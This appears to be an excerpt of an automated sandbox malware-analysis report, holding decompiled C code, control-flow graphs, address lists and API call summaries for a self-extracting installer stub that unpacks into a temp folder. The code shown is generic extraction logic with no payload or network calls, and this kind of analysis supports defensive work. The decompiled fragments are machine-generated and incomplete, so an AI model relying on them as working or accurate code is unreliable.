                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: 18780b3a3d9adefdd134998c69f8cc973b4a87bd2269f8ea0a91145dcfe8b1a3
                                                                                                                                                                                                      • Instruction ID: b8d432d1c505385a6e9a1766b91751e542087ca3b1a45bce42ce713b0562b68d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18780b3a3d9adefdd134998c69f8cc973b4a87bd2269f8ea0a91145dcfe8b1a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E31E9F1742701BFE7109B63AD8DF6B369CAB44759F489034B90DB21E2DBB48C858651
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 450 e72f1d-e72f3d 451 e72f3f-e72f46 450->451 452 e72f6c-e72f73 call e75164 450->452 454 e72f5f-e72f66 call e73a3f 451->454 455 e72f48 call e751e5 451->455 459 e73041 452->459 460 e72f79-e72f80 call e755a0 452->460 454->452 454->459 461 e72f4d-e72f4f 455->461 464 e73043-e73053 call e76ce0 459->464 460->459 468 e72f86-e72fbe GetSystemDirectoryA call e7658a LoadLibraryA 460->468 461->459 465 e72f55-e72f5d 461->465 465->452 465->454 472 e72ff7-e73004 FreeLibrary 468->472 473 e72fc0-e72fd4 GetProcAddress 468->473 475 e73017-e73024 SetCurrentDirectoryA 472->475 476 e73006-e7300c 472->476 473->472 474 e72fd6-e72fee DecryptFileA 473->474 474->472 489 e72ff0-e72ff5 474->489 477 e73026-e7303c call e744b9 call e76285 475->477 478 e73054-e7305a 475->478 476->475 479 e7300e call e7621e 476->479 477->459 483 e73065-e7306c 478->483 484 e7305c call e73b26 478->484 485 e73013-e73015 479->485 486 e7306e-e73075 call e7256d 483->486 487 e7307c-e73089 483->487 495 e73061-e73063 484->495 485->459 485->475 496 e7307a 486->496 492 e730a1-e730a9 487->492 493 e7308b-e73091 487->493 489->472 499 e730b4-e730b7 492->499 500 e730ab-e730ad 492->500 493->492 497 e73093 call e73ba2 493->497 495->459 495->483 496->487 503 e73098-e7309a 497->503 499->464 500->499 502 e730af call e74169 500->502 502->499 503->459 505 e7309c 503->505 505->492
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00E72F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0xe78a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E00E75164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E00E76CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E00E755A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E00E7658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0xe7a288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0xe78a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0xe78a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0xe78d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0xe78d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0xe79a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E00E7256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0xe78a24; // 0x0
                                                                                                                                                                                                      									 *0xe79a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0xe78a38;
                                                                                                                                                                                                      										if( *0xe78a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E00E74169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0xe79a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E00E73BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0xe78a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E00E73B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                      							E00E744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0xe79124 = E00E76285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0xe79a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00E7621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0xe78a24;
                                                                                                                                                                                                      				if( *0xe78a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E00E73A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00E751E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0xe78a38;
                                                                                                                                                                                                      				if( *0xe78a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x00e72f1d
                                                                                                                                                                                                      0x00e72f28
                                                                                                                                                                                                      0x00e72f2f
                                                                                                                                                                                                      0x00e72f3d
                                                                                                                                                                                                      0x00e72f6c
                                                                                                                                                                                                      0x00e72f6c
                                                                                                                                                                                                      0x00e72f71
                                                                                                                                                                                                      0x00e72f73
                                                                                                                                                                                                      0x00e73041
                                                                                                                                                                                                      0x00e73041
                                                                                                                                                                                                      0x00e73043
                                                                                                                                                                                                      0x00e73053
                                                                                                                                                                                                      0x00e73053
                                                                                                                                                                                                      0x00e72f79
                                                                                                                                                                                                      0x00e72f80
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72f86
                                                                                                                                                                                                      0x00e72f86
                                                                                                                                                                                                      0x00e72f93
                                                                                                                                                                                                      0x00e72f9e
                                                                                                                                                                                                      0x00e72fa0
                                                                                                                                                                                                      0x00e72fa6
                                                                                                                                                                                                      0x00e72fb8
                                                                                                                                                                                                      0x00e72fba
                                                                                                                                                                                                      0x00e72fbe
                                                                                                                                                                                                      0x00e72fc6
                                                                                                                                                                                                      0x00e72fcc
                                                                                                                                                                                                      0x00e72fd4
                                                                                                                                                                                                      0x00e72fd6
                                                                                                                                                                                                      0x00e72fd8
                                                                                                                                                                                                      0x00e72fe0
                                                                                                                                                                                                      0x00e72fe6
                                                                                                                                                                                                      0x00e72fee
                                                                                                                                                                                                      0x00e72ff0
                                                                                                                                                                                                      0x00e72ff5
                                                                                                                                                                                                      0x00e72ff5
                                                                                                                                                                                                      0x00e72fee
                                                                                                                                                                                                      0x00e72fd4
                                                                                                                                                                                                      0x00e72ff8
                                                                                                                                                                                                      0x00e72ffe
                                                                                                                                                                                                      0x00e73004
                                                                                                                                                                                                      0x00e73017
                                                                                                                                                                                                      0x00e7301c
                                                                                                                                                                                                      0x00e73024
                                                                                                                                                                                                      0x00e73054
                                                                                                                                                                                                      0x00e7305a
                                                                                                                                                                                                      0x00e73065
                                                                                                                                                                                                      0x00e73065
                                                                                                                                                                                                      0x00e7306c
                                                                                                                                                                                                      0x00e7306e
                                                                                                                                                                                                      0x00e73075
                                                                                                                                                                                                      0x00e7307a
                                                                                                                                                                                                      0x00e7307a
                                                                                                                                                                                                      0x00e7307c
                                                                                                                                                                                                      0x00e73081
                                                                                                                                                                                                      0x00e73087
                                                                                                                                                                                                      0x00e73089
                                                                                                                                                                                                      0x00e730a1
                                                                                                                                                                                                      0x00e730a1
                                                                                                                                                                                                      0x00e730a9
                                                                                                                                                                                                      0x00e730ab
                                                                                                                                                                                                      0x00e730ad
                                                                                                                                                                                                      0x00e730af
                                                                                                                                                                                                      0x00e730af
                                                                                                                                                                                                      0x00e730ad
                                                                                                                                                                                                      0x00e730b6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7308b
                                                                                                                                                                                                      0x00e7308b
                                                                                                                                                                                                      0x00e73091
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73093
                                                                                                                                                                                                      0x00e73098
                                                                                                                                                                                                      0x00e7309a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7309c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7309c
                                                                                                                                                                                                      0x00e73089
                                                                                                                                                                                                      0x00e7305c
                                                                                                                                                                                                      0x00e73061
                                                                                                                                                                                                      0x00e73063
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73063
                                                                                                                                                                                                      0x00e7302b
                                                                                                                                                                                                      0x00e73032
                                                                                                                                                                                                      0x00e7303c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7303c
                                                                                                                                                                                                      0x00e73006
                                                                                                                                                                                                      0x00e7300c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7300e
                                                                                                                                                                                                      0x00e73015
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73015
                                                                                                                                                                                                      0x00e72f80
                                                                                                                                                                                                      0x00e72f3f
                                                                                                                                                                                                      0x00e72f46
                                                                                                                                                                                                      0x00e72f5f
                                                                                                                                                                                                      0x00e72f5f
                                                                                                                                                                                                      0x00e72f64
                                                                                                                                                                                                      0x00e72f66
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72f66
                                                                                                                                                                                                      0x00e72f4f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72f55
                                                                                                                                                                                                      0x00e72f5d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E72F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00E72FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00E72FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 00E72FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E72FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7301C
                                                                                                                                                                                                        • Part of subcall function 00E751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E72F4D,?,00000002,00000000), ref: 00E75201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-3123416969
                                                                                                                                                                                                      • Opcode ID: 495585a9aa76333b78929b8efbbcca7643b270fed13fd6690244106f0d4129cb
                                                                                                                                                                                                      • Instruction ID: 7fcc508cc24ceea8ba44f5a0a2456c9f9c4c47647ed172b139aebabc7d1a1b9c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 495585a9aa76333b78929b8efbbcca7643b270fed13fd6690244106f0d4129cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0411A30A012058EDBB4EB329D4965A33F89B54758F10E075E90DF2192EF74CEC5DA51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 522 e75467-e75484 523 e7551c-e75528 call e71680 522->523 524 e7548a-e75490 call e753a1 522->524 528 e7552d-e75539 call e758c8 523->528 527 e75495-e75497 524->527 529 e75581-e75583 527->529 530 e7549d-e754c0 call e71781 527->530 535 e7554d-e75552 528->535 536 e7553b-e75545 CreateDirectoryA 528->536 533 e7558d-e7559d call e76ce0 529->533 544 e754c2-e754d8 GetSystemInfo 530->544 545 e7550c-e7551a call e7658a 530->545 542 e75585-e7558b 535->542 543 e75554-e75557 call e7597d 535->543 540 e75577-e7557c call e76285 536->540 541 e75547 536->541 540->529 541->535 542->533 553 e7555c-e7555e 543->553 546 e754fe 544->546 547 e754da-e754dd 544->547 545->528 554 e75503-e75507 call e7658a 546->554 551 e754f7-e754fc 547->551 552 e754df-e754e2 547->552 551->554 557 e754e4-e754e7 552->557 558 e754f0-e754f5 552->558 553->542 559 e75560-e75566 553->559 554->545 557->545 561 e754e9-e754ee 557->561 558->554 559->529 562 e75568-e75575 RemoveDirectoryA 559->562 561->554 562->529
                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00E75467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0xe791e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00E71680(0xe791e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E00E758C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E00E76CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E00E7597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0xe78a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0xe78a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0xe79124 = E00E76285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe78a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E00E753A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0xe791e4;
                                                                                                                                                                                                      				E00E71781(0xe791e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0xe79a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00E7658A(_t48, 0x104, 0xe71140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E00E7658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      0x00e75472
                                                                                                                                                                                                      0x00e75479
                                                                                                                                                                                                      0x00e75481
                                                                                                                                                                                                      0x00e75484
                                                                                                                                                                                                      0x00e7551c
                                                                                                                                                                                                      0x00e75521
                                                                                                                                                                                                      0x00e75528
                                                                                                                                                                                                      0x00e7552d
                                                                                                                                                                                                      0x00e7552f
                                                                                                                                                                                                      0x00e75539
                                                                                                                                                                                                      0x00e7554d
                                                                                                                                                                                                      0x00e7554d
                                                                                                                                                                                                      0x00e75552
                                                                                                                                                                                                      0x00e75585
                                                                                                                                                                                                      0x00e75585
                                                                                                                                                                                                      0x00e7558b
                                                                                                                                                                                                      0x00e7558d
                                                                                                                                                                                                      0x00e7559d
                                                                                                                                                                                                      0x00e7559d
                                                                                                                                                                                                      0x00e75557
                                                                                                                                                                                                      0x00e7555e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75560
                                                                                                                                                                                                      0x00e75566
                                                                                                                                                                                                      0x00e75569
                                                                                                                                                                                                      0x00e7556f
                                                                                                                                                                                                      0x00e7556f
                                                                                                                                                                                                      0x00e75581
                                                                                                                                                                                                      0x00e75581
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75581
                                                                                                                                                                                                      0x00e75545
                                                                                                                                                                                                      0x00e7557c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7557c
                                                                                                                                                                                                      0x00e75547
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75547
                                                                                                                                                                                                      0x00e7548a
                                                                                                                                                                                                      0x00e75490
                                                                                                                                                                                                      0x00e75497
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7549d
                                                                                                                                                                                                      0x00e754ab
                                                                                                                                                                                                      0x00e754b4
                                                                                                                                                                                                      0x00e754c0
                                                                                                                                                                                                      0x00e7550c
                                                                                                                                                                                                      0x00e75511
                                                                                                                                                                                                      0x00e75515
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75515
                                                                                                                                                                                                      0x00e754c9
                                                                                                                                                                                                      0x00e754d6
                                                                                                                                                                                                      0x00e754d8
                                                                                                                                                                                                      0x00e754fe
                                                                                                                                                                                                      0x00e75503
                                                                                                                                                                                                      0x00e75507
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75507
                                                                                                                                                                                                      0x00e754da
                                                                                                                                                                                                      0x00e754dd
                                                                                                                                                                                                      0x00e754f7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e754f7
                                                                                                                                                                                                      0x00e754df
                                                                                                                                                                                                      0x00e754e2
                                                                                                                                                                                                      0x00e754f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e754f0
                                                                                                                                                                                                      0x00e754e7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e754e9
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E754C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7556F
                                                                                                                                                                                                        • Part of subcall function 00E753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E753FB
                                                                                                                                                                                                        • Part of subcall function 00E753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75402
                                                                                                                                                                                                        • Part of subcall function 00E753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7541F
                                                                                                                                                                                                        • Part of subcall function 00E753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7542B
                                                                                                                                                                                                        • Part of subcall function 00E753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
